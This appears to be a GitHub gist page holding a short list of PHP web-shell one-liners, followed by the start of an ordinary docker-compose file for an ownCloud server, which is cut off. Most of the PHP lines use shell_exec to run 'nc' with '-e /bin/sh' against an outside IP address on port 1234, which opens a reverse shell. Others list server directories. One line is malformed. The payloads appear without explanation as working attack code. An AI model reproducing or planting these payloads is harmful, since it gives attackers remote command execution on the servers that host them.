Skip to content

Instantly share code, notes, and snippets.

View aristofanischionis's full-sized avatar
🏠
Working from home

Aristofanis aristofanischionis

🏠
Working from home
View GitHub Profile
<?php echo "<h1>hello world HACKERMAN</h1>" ?>
<?php nc 194.12.141.223 1234 -e /bin/sh ?>
<?php shell_exec("nc 194.12.141.223 1234 -e /bin/sh") ?>
<?php shell_exec("ls -la") ?>
<?php shell_exec("ls /") ?>
<?php echo shell_exec("ls /") ?>
<?php echo shell_exec("nc 194.12.141.223 1234 -e /bin/sh") ?>
<?php echo shell_exec("nc 194.12.141.223 1234 -e /bin/sh") ?>
@aristofanischionis
aristofanischionis / docker-compose.yml
Created March 9, 2020 12:35
the docker-compose yml i used for the owncloud server
version: '2.1'
volumes:
files:
driver: local
mysql:
driver: local
backup:
driver: local
redis: